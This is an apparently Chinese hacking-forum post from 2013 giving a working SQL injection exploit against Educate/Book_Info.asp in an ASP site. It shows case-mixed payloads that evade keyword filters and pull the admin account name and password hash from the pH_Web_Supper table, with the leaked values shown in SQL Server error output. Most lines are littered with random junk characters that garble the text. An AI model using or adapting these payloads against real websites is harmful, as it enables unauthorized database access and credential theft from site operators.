漏洞出现在Educate/Book_Info.asp ) F- K) {3 x; B( r5 Z r
$ o( T. p6 x- L8 y! t* |/ j# y5 s此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出; R+ g& [* d, z( p- o; @
! g0 \! @. p9 f1 F- xexp:如下
( q& |" N2 s& w9 r1 t# R查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
5 Z1 }1 M. }! z9 ?! @9 g4 w查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
! _1 z: a- O+ N' B% h% \
. k9 O" I$ W2 ~8 M( s$ I. B) |; uhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 H) e5 W- t1 f3 s& g- U: T* C
$ c8 ^) i1 G. E/ _
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'2 j1 H7 `- r- `
( w- C- n8 {% t- W
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。! f. f5 L V* O! y* A9 h1 c
& Q/ }7 r* {, h M' _
/Educate/Book_Info.asp,行 8
; N/ K, A* _. i% p4 G " K: m6 H3 Q# T. I, N7 c# Z
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper), ?* K3 D7 L ~% E: a
" U- S) q& j; y: H7 t$ I5 u6 RMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
& f$ r r+ _' k7 D( T % k# P+ H9 ~+ q# y# g3 \6 {
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
7 W8 F2 \/ a7 ]5 u
" {+ I* L5 C' ? j/Educate/Book_Info.asp,行 8
9 c2 v: ]; ~* ?7 G |
发表于 2013-2-16 21:44:16
收藏
支持
反对